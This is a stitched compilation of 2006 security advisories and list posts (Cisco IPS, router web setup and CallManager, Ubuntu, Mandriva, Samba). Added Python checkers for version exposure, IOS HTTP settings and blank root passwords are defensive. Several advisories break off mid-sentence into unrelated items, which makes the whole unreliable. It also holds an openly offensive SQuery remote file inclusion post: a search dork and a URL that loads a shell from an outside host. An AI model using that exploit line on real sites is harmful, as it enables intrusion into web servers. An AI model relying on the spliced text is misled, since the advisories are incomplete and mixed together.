Cisco Intrusion Prevention System, Version 5.1(1p1)S215.0

Details

Cisco Intrusion Prevention Systems (IPS) are a family of network security devices that provide network-based threat prevention services.

A vulnerability exists in the custom device driver for Intel-based gigabit network adapters used to process packets received by the sensing interfaces of certain IPS devices. A malformed IP packet received on an Intel-based gigabit network adapter configured for use as a sensing interface may result in the IPS device experiencing a kernel panic. Affected IPS devices will cease processing packets, producing alerts, and performing automated actions such as logging, and will become inaccessible remotely or via the console. If deployed as an inline device, the IPS will also stop forwarding packets between interfaces and may cause a network outage. IPS devices configured to use the auto-bypass feature will also fail to forward packets. Attackers may use this vulnerability to disable an IPS device to hide malicious activity.

This vulnerability only affects certain IPS devices configured to use Intel-based gigabit network adapters as sensing interfaces. IPS devices configured to use an Intel-based gigabit network adapter as a management interface are not affected by this vulnerability. A power reset is required to recover the IPS device.

This vulnerability is documented in Cisco bug ID CSCsd36590 (registered customers only).

Impact

Successful exploitation of the vulnerability may result in the failure of an IPS device to operate as expected. Affected devices will become inaccessible remotely or via the console and stop processing packets. If deployed as an inline device, an IPS device will stop forwarding packets, including devices configured to use the auto-bypass feature. This may result in a network outage. A power reset is required to recover the IPS device.

Software Version and Fixes

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to
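An added Python helper, not from Cisco, that applies the advisory's tables to a show version excerpt: it pulls the version token, matches the 5.1(1) family the advisory lists (both spellings of the patch release, 5.1(p1) and 5.1(1p1), are accepted), and combines that with the appliance model, which the operator supplies because the excerpt on the page does not print it. The sample show version text is constructed.

```python
import re

# Appliances the advisory lists as potentially affected on the 5.1(1) builds
VULNERABLE_MODELS = {"IDS-4235", "IPS-4240", "IDS-4250-SX", "IDS-4250-TX",
                     "IDS-4250-XL", "IPS-4255"}
# Platforms the advisory confirms not vulnerable even on 5.1(1), plus the two
# that cannot run 5.1 at all
NOT_VULNERABLE_MODELS = {"NM-CIDS", "IDSM-2", "ASA-SSM-AIP-10", "ASA-SSM-AIP-20",
                         "IDS-4210", "IDS-4215", "IDS-4220", "IDS-4230"}

# 5.1(1), 5.1(1a)..5.1(1e) and the patch release; whatever follows ')' (the
# signature level, e.g. S215.0) does not matter for the assessment
AFFECTED_VERSION_RE = re.compile(r"^5\.1\((?:1[a-e]?(?:p\d+)?|p\d+)\)")
SHOW_VERSION_RE = re.compile(r"Cisco Intrusion Prevention System, Version (\S+)")


def parse_ips_version(show_version_output):
    """Extract the version token from 'show version' text; None if not found."""
    m = SHOW_VERSION_RE.search(show_version_output)
    return m.group(1) if m else None


def version_in_affected_list(version):
    """True for the 5.1(1)-family builds the advisory names."""
    return bool(version) and AFFECTED_VERSION_RE.match(version) is not None


def assess(model, show_version_output):
    """Return 'vulnerable', 'not vulnerable' or 'unknown' per the advisory's tables.

    model is supplied by the operator (assumption: the page's show version
    excerpt does not include the appliance model)."""
    version = parse_ips_version(show_version_output)
    if version is None:
        return "unknown"
    if not version_in_affected_list(version):
        return "not vulnerable"      # 4.x, 5.0(x) and anything else not listed
    if model in NOT_VULNERABLE_MODELS:
        return "not vulnerable"
    if model in VULNERABLE_MODELS:
        return "vulnerable"
    return "unknown"                  # model not covered by the advisory's tables


# Constructed samples modelled on the advisory's show version excerpt
SAMPLE_51 = """sensor#show version
Application Partition:
Cisco Intrusion Prevention System, Version 5.1(1p1)S215.0
"""
SAMPLE_50 = "Cisco Intrusion Prevention System, Version 5.0(6)S215.0\n"

if __name__ == "__main__":
    for model, text in (("IPS-4240", SAMPLE_51), ("IDSM-2", SAMPLE_51), ("IPS-4240", SAMPLE_50)):
        print(model, parse_ips_version(text), "->", assess(model, text))
```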
[USN-314-1] samba vulnerability
Ubuntu Security Notice USN-314-1
July 12, 2006

samba vulnerability
CVE-2006-3403

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.04:
  samba 3.0.10-1ubuntu3.1

Ubuntu 5.10:
  samba 3.0.14a-6ubuntu1.1

Ubuntu 6.06 LTS:
  samba 3.0.22-1ubuntu3.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

The Samba security team reported a Denial of Service vulnerability in the handling of information about active connections. In certain circumstances an attacker could continually increase the memory usage of the smbd process by issuing a large number of share connection requests. By draining all available memory, this could be exploited to render the remote Samba server unusable.

Updated packages for Ubuntu 5.04:

Source archives:
Re: [ANNOUNCEMENT] Samba 3.0.1 - 3.0.22: memory exhaustion DoS against smbd
Gerald (Jerry) Carter wrote:
> ==
> ==
> == Subject:     Memory exhaustion DoS against smbd
> == CVE ID#:     CAN-2006-1059
                  ^^
> ==
> == Versions:    Samba 3.0.1 - 3.0.22 (inclusive)
> ==
> == Summary:     smbd may allow internal structures
> ==              maintaining state for share connections
> ==              to grow unbounded.
> ==
> ==

This is a cut-n-paste error. The correct CVE # is CVE-2006-3403. Sorry for any confusion. It has been updated on the web site as well. All other information is correct.

cheers, jerry

Samba    --- http://www.samba.org
Centeris --- http://www.centeris.com
"What man is a man who does not make the world better?" --Balian
SQuery <= 4.5(libpath) Remote File Inclusion Exploit
SQuery <= 4.5 (libpath) Remote File Inclusion Exploit

Worked On : ALL VERSIONS
Critical Level : Dangerous
Bug Found In : gore.php

Dork : "SQuery 4.5" | "SQuery 4.0" | "SQuery 3.9" | inurl:"modules.php?name=SQuery"

http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?

Discovered By : SHiKaA
Contact : SHiKaA-[at]hotmail.com

GreetZ : BlAcK_BiRd Kambaa NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA 3amer
Re: ATutor 1.5.3 Cross Site Scripting
The XSS issues have been patched and will be available in the coming maintenance release (1.5.3_pl1). The mentioned SQL injection vulnerability is not possible. Please remove it.
[ MDKA-2006:119 ] - Updated ppp packages fix plugin vulnerability
Mandriva Linux Security Advisory MDKA-2006:119
http://www.mandriva.com/security/

Package : ppp
Date: July 10, 2006
Affected: 2006.0

Problem Description:

Marcus Meissner discovered that pppd's winbind plugin did not check the result of the setuid() call, which could allow an attacker to exploit this on systems with certain PAM limits enabled to execute the NTLM authentication helper as root. This could possibly lead to privilege escalation dependent upon the local winbind configuration.

Updated packages have been patched to correct this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2194

Updated Packages:

Mandriva Linux 2006.0:

Mandriva Linux 2006.0/X86_64:
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.

You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
Cisco Security Advisory: Cisco Router Web Setup Ships with Insecure Default IOS Configuration
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Router Web Setup Ships with Insecure Default IOS Configuration Document ID: 70650 Advisory ID: cisco-sa-20060712-crws http://www.cisco.com/warp/public/707/cisco-sa-20060712-crws.shtml Revision 1.0 For Public Release 2006 July 12 1600 UTC (GMT) - --- Contents Summary Affected Products Details Impact Software Version and Fixes Workarounds Obtaining Fixed Software Exploitation and Public Announcements Status of this Notice: FINAL Distribution Revision History Cisco Security Procedures - --- Summary === The default Cisco IOS configuration shipped with the Cisco Router Web Setup (CRWS) application allows the execution of commands at privilege level 15 through the Cisco IOS HTTP (Hypertext Transfer Protocol) server web interface without requiring authentication credentials. Privilege level 15 is the highest privilege level on Cisco IOS? devices. Fixed versions of the CRWS application have been modified by Cisco to provide a more secure default IOS configuration and additional functionality with regards to the Cisco IOS HTTP server web interface. This issue does not require a Cisco IOS software upgrade or a CRWS software upgrade. Customers who decide to upgrade to a fixed version of CRWS and deploy the new default IOS configuration will not need to deploy the suggested workarounds. Customers who elect NOT to upgrade to a fixed CRWS version, or customers upgrading to a fixed CRWS version who keep their existing configuration should implement the workarounds identified in this advisory. Additional information on the new default IOS configuration shipped with the CRWS application is available in the Details section of this advisory. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20060712-crws.shtml. 
Affected Products = Vulnerable Products +-- The following Cisco routers whose configurations have been based on the default IOS configuration shipped with any version of CRWS prior to version 3.3.0 build 31 may be affected by this vulnerability: * Cisco 806 * Cisco 826 * Cisco 827 * Cisco 827H * Cisco 827-4v * Cisco 828 * Cisco 831 * Cisco 836 * Cisco 837 * Cisco SOHO 71 * Cisco SOHO 76 * Cisco SOHO 77 * Cisco SOHO 77H * Cisco SOHO 78 * Cisco SOHO 91 * Cisco SOHO 96 * Cisco SOHO 97 Products Confirmed Not Vulnerable + Any of the previously listed Cisco routers whose IOS configuration is not based on the default IOS configuration shipped with the CRWS application are not vulnerable. No other Cisco products are currently known to be affected by this vulnerability. Details === The Cisco Router Web Setup tool (CRWS) provides a graphical user interface (GUI) for configuring Cisco SOHO and Cisco 800 series routers, and allows users to set up their routers quickly and easily. The GUI is accessed through the Cisco IOS HTTP server, which is enabled on the default IOS configuration shipped with the CRWS application. The Cisco IOS HTTP server uses the "enable password" (assuming one has been configured) as its default authentication mechanism. Other authentication mechanisms can be configured, including the use of a local user database, an external RADIUS (Remote Authentication Dial In User Service) or an external TACACS+ (Terminal Access Controller Access Control System) server. The default IOS configuration shipped with the CRWS application does not include an "enable password" or an "enable secret" command, allowing access to the Cisco IOS HTTP server interface at any privilege level, up to and including privilege level 15, without providing authentication credentials. Privilege level 15 is the highest privilege level on Cisco IOS devices. 
To resolve this vulnerability, Cisco has made changes to the default IOS configuration shipped with the CRWS application and to the CRWS application itself. Those changes are as follows:

  * The addition of a default username and password combination to be used during initial device configuration.

    Note: CRWS will prompt the user to change those default credentials during its first invocation. It is strongly recommended that customers remove those default credentials from the device configuration by using the Cisco IOS CLI (command line interface) if they are not planning to use the CRWS application for device configuration.

  * The addition of an authentication mechanism for the Cisco IOS HTTP server to authenticate users based on the local user database.

  * The addition of an access restriction to only allow connections to the Cisco IOS HTTP server from the internal network, using the addressi
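As an added example (not part of the Cisco advisory), the check below audits a saved IOS configuration for the exact combination the Details section describes: HTTP server enabled, authentication left on the default of the enable password, and no enable password or secret present, plus whether an access-class limits who can reach the HTTP server. The two configurations are constructed samples; the commands they use (enable secret, username, ip http server, ip http authentication, ip http access-class, access-list) are standard IOS commands and the hash strings are placeholders.

```python
"""Audit a saved Cisco IOS configuration for the CRWS default-configuration weakness.

Added example, not part of the Cisco advisory. The configurations below are
constructed samples using standard IOS commands; hash strings are placeholders.
"""
import re

# Constructed sample: the shape of the weak default the advisory describes.
# HTTP server on, no enable password/secret, HTTP authentication left on its
# default (the enable password), so the web interface needs no credentials.
WEAK_CONFIG = """\
hostname soho-router
!
ip http server
!
interface Ethernet0
 ip address 10.10.10.1 255.255.255.0
!
end
"""

# Constructed sample: the same router with the three fixes the advisory lists
# (local user, HTTP authentication against the local database, access restriction).
FIXED_CONFIG = """\
hostname soho-router
!
enable secret 5 $1$PLACEHOLDER$xxxxxxxxxxxxxxxxxxxxxx
username admin privilege 15 secret 5 $1$PLACEHOLDER$yyyyyyyyyyyyyyyyyyyyyy
!
ip http server
ip http authentication local
ip http access-class 23
!
access-list 23 permit 10.10.10.0 0.0.0.255
!
end
"""


def audit_http_config(config: str) -> dict:
    """Return findings for the Cisco IOS HTTP server settings in a config dump.

    unauthenticated_http: HTTP server enabled, authentication left on the
        default (enable password), and no enable password or secret set.
    missing_access_class: HTTP server enabled but no access-class restricts
        which source addresses may connect to it.
    """
    lines = [line.strip() for line in config.splitlines()]

    def present(pattern: str) -> bool:
        # re.match anchors at the line start, so "no ip http server"
        # does not count as "ip http server".
        return any(re.match(pattern, line) for line in lines)

    http_enabled = present(r"ip http server$")
    # Any explicit method other than the default enable-password method counts.
    non_default_auth = present(r"ip http authentication (local|aaa|tacacs)\b")
    enable_credential = present(r"enable (secret|password) ")
    access_class = present(r"ip http access-class \d+")

    return {
        "http_enabled": http_enabled,
        "unauthenticated_http": http_enabled and not non_default_auth and not enable_credential,
        "missing_access_class": http_enabled and not access_class,
    }


if __name__ == "__main__":
    for name, cfg in (("weak default", WEAK_CONFIG), ("fixed", FIXED_CONFIG)):
        print(name, audit_http_config(cfg))
```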
Cisco Security Advisory: Multiple Cisco Unified CallManager Vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Multiple Cisco Unified CallManager Vulnerabilities

Advisory ID: cisco-sa-20060712-cucm
http://www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml
Revision 1.0
For Public Release 2006 July 12 1600 UTC (GMT)

---

Contents

Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

---

Summary
=======

Cisco Unified CallManager (CUCM) 5.0 has Command Line Interface (CLI) and Session Initiation Protocol (SIP) related vulnerabilities. There are potential privilege escalation vulnerabilities in the CLI which may allow an authenticated administrator to access the base operating system with root privileges. There is also a buffer overflow vulnerability in the processing of hostnames contained in a SIP request which may result in arbitrary code execution or cause a denial of service. These vulnerabilities only affect Cisco Unified CallManager 5.0.

Cisco has made free software available to address these vulnerabilities for affected customers. There are no workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml

Affected Products
=================

Vulnerable Products
+------------------

Only Cisco Unified CallManager versions 5.0(1), 5.0(2), 5.0(3) and 5.0(3a) are affected. The version of CallManager software running can be determined by navigating to Show > Software in the CUCM IPT Platform administration interface or by running the command show version active in the CLI.

Products Confirmed Not Vulnerable
+--------------------------------

No other Cisco products are currently known to be affected by these vulnerabilities, including all previous versions of Cisco Unified CallManager.
Details
=======

Cisco Unified CallManager is the software-based call-processing component of the Cisco IP telephony solution which extends enterprise telephony features and functions to packet telephony network devices such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications.

The CallManager CLI provides a backup management interface to the system in order to diagnose and troubleshoot the primary HTTPS-based management interfaces. The CLI, which runs as the root user, contains two vulnerabilities in the parsing of commands. The first vulnerability may allow an authenticated CUCM administrator to execute arbitrary operating system programs as the root user. The second vulnerability may allow output redirection of a command to a file or a folder specified on the command line.

Cisco Unified CallManager supports the coexistence of both SCCP and SIP phones, allowing for migration to SIP while protecting investments in existing devices. CUCM contains a buffer overflow vulnerability in the processing of excessively long hostnames which may be included in a SIP request.

These issues are documented by the following Cisco bug IDs:

  * CSCse11005 (registered customers only)
    Certain CLI commands allow execution of arbitrary Linux commands

  * CSCse31704 (registered customers only)
    User able to redirect command output to a file folder

  * CSCsd96542 (registered customers only)
    SD-GA: CCM cores when SIP request line host name has ASCII overflow

Impact
======

Successful exploitation of the CLI vulnerability documented in Cisco bug ID CSCse11005 may allow authenticated CLI users to execute arbitrary operating system commands with root privileges. Exploitation of the CLI vulnerability documented in Cisco bug ID CSCse31704 may allow an authenticated CLI user to modify or overwrite any file on the filesystem as the root user.
Exploitation of the SIP vulnerability documented in Cisco bug ID CSCsd96542 may result in arbitrary code execution or a denial of service.

Software Version and Fixes
==========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center ("TAC") or your contracted maintenance provider for assistance.

Workarounds
===========

There are no workarounds for these vulnerabilities.

Obtaining Fixed Software
========================

Cisco will make free software available to
[USN-315-1] libmms, xine-lib vulnerabilities
===========================================================
Ubuntu Security Notice USN-315-1          July 12, 2006
libmms, xine-lib vulnerabilities
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.04:
  libxine1                        1.0-1ubuntu3.8

Ubuntu 5.10:
  libmms0                         0.1-0ubuntu1.2
  libxine1c2                      1.0.1-1ubuntu10.4

Ubuntu 6.06 LTS:
  libxine-main1                   1.1.1+ubuntu2-7.2

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Matthias Hopf discovered several buffer overflows in libmms. By tricking a user into opening a specially crafted remote multimedia stream with an application using libmms, a remote attacker could exploit this to execute arbitrary code with the user's privileges.

The Xine library contains an embedded copy of libmms, and thus needs the same security update.

Updated packages for Ubuntu 5.04:
[USN-316-1] installer vulnerability
===========================================================
Ubuntu Security Notice USN-316-1          July 12, 2006
Installer vulnerability
https://launchpad.net/bugs/48350
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  passwd                          1:4.0.13-7ubuntu3.2

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Iwan Pieterse discovered that, if you select "Go Back" at the final message displayed by the alternate or server CD installer ("Installation complete") and then continue with the installation from the installer's main menu, the root password is left blank rather than locked. This was due to an error while clearing out the root password from the installer's memory to avoid possible information leaks.

Installations from the alternate or server CDs when the user selected "Continue" when the "Installation complete" message was first displayed are not affected by this bug. Installations from the desktop CD are not affected by this bug at all.

When you upgrade your passwd package to the newest version, it will detect this condition and lock the root password if it was previously blank. The next point release of Ubuntu 6.06 LTS will include a corrected installer.
Updated packages for Ubuntu 6.06 LTS:
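The notice distinguishes a blank root password (what the affected installer left behind) from a locked one (what the updated passwd package turns it into). As an added example, not part of the Ubuntu notice or the passwd package, the snippet below classifies shadow-format password fields, lists accounts with an empty field, and applies the conventional lock marker ("!" in the password field) to a blank root entry. The shadow lines are constructed samples and the hash is a placeholder.

```python
"""Detect and lock a blank root password in shadow-format data.

Added example, not the Ubuntu notice's or the passwd package's own code.
Sample lines are constructed; the hash value is a placeholder.
"""

# Constructed sample: root left blank (the installer bug's outcome),
# a locked system account, and a normal user with a (placeholder) hash.
SAMPLE_SHADOW = """\
root::13340:0:99999:7:::
daemon:*:13340:0:99999:7:::
alice:$1$PLACEHOLDER$zzzzzzzzzzzzzzzzzzzzzz:13340:0:99999:7:::
"""

# Constructed sample: root already locked, the state the installer intended.
LOCKED_SHADOW = "root:!:13340:0:99999:7:::\n"


def classify_password_field(field: str) -> str:
    """Return 'blank', 'locked' or 'hashed' for one shadow password field.

    An empty field lets the account log in with no password at all. A field
    starting with '!' or '*' can never match a typed password, so the account
    is locked. Anything else is treated as a password hash.
    """
    if field == "":
        return "blank"
    if field.startswith(("!", "*")):
        return "locked"
    return "hashed"


def blank_password_accounts(shadow_text: str) -> list:
    """Return the names of accounts whose shadow password field is empty."""
    blank = []
    for line in shadow_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue  # malformed line: skip rather than misreport it
        if classify_password_field(fields[1]) == "blank":
            blank.append(fields[0])
    return blank


def lock_blank_root(shadow_text: str) -> str:
    """Return shadow_text with a blank root password replaced by the lock marker.

    This is the repair the notice describes the updated passwd package making;
    every other line is returned unchanged.
    """
    out = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0] == "root" and fields[1] == "":
            fields[1] = "!"
        out.append(":".join(fields))
    return "\n".join(out) + ("\n" if shadow_text.endswith("\n") else "")


if __name__ == "__main__":
    print("blank password accounts:", blank_password_accounts(SAMPLE_SHADOW))
    print(lock_blank_root(SAMPLE_SHADOW))
```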
[USN-313-1] OpenOffice.org vulnerabilities
===========================================================
Ubuntu Security Notice USN-313-1          July 11, 2006
openoffice.org-amd64, openoffice.org vulnerabilities
CVE-2006-2198, CVE-2006-2199, CVE-2006-3117
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.04:
  openoffice.org-bin              1.1.3-8ubuntu2.4

Ubuntu 6.06 LTS:
  openoffice.org-base             2.0.2-2ubuntu12.1
  openoffice.org-common           2.0.2-2ubuntu12.1
  openoffice.org-core             2.0.2-2ubuntu12.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Ubuntu 5.10 is also affected by these flaws. Updated packages will be provided shortly.

Details follow:

It was possible to embed Basic macros in documents in a way that OpenOffice.org would not ask for confirmation about executing them. By tricking a user into opening a malicious document, this could be exploited to run arbitrary Basic code (including local file access and modification) with the user's privileges. (CVE-2006-2198)

A flaw was discovered in the Java sandbox which allowed Java applets to break out of the sandbox and execute code without restrictions. By tricking a user into opening a malicious document, this could be exploited to run arbitrary code with the user's privileges. This update disables Java applets for OpenOffice.org, since it is not generally possible to guarantee the sandbox restrictions. (CVE-2006-2199)

A buffer overflow has been found in the XML parser. By tricking a user into opening a specially crafted XML file with OpenOffice.org, this could be exploited to execute arbitrary code with the user's privileges. (CVE-2006-3117)

Updated packages for Ubuntu 5.04:
Re: LAMP vs Microsoft
Researcher "fads," differences in vendor disclosure practices, and vulnerability database editorial policies will heavily influence vulnerability statistics, to the point where comparing them is not very informative (at least, you're not getting the whole picture). You also have the challenge of defining equivalent platforms to compare against each other. However, there is one area where you can really compare 2 products to each other: implementation of standards. These standards could be protocol-based, file-based (e.g. image formats), or scheme-based (such as authentication or crypto schemes). It would be great to see some more focused efforts that are based on standards that are implemented in a cross-OS fashion. This would allow the community to harness the power of fuzzing and suite-testing in a narrow fashion. We would only get narrow answers, of course - "these kinds of implementation bugs were looked for and found on these kinds of products" - but it would be much more manageable and measurable, and above all, we would be comparing apples to apples. If someone is interested in pursuing this further, you could probably start with past data from PROTOS and other past fuzzing/suite-testing results. - Steve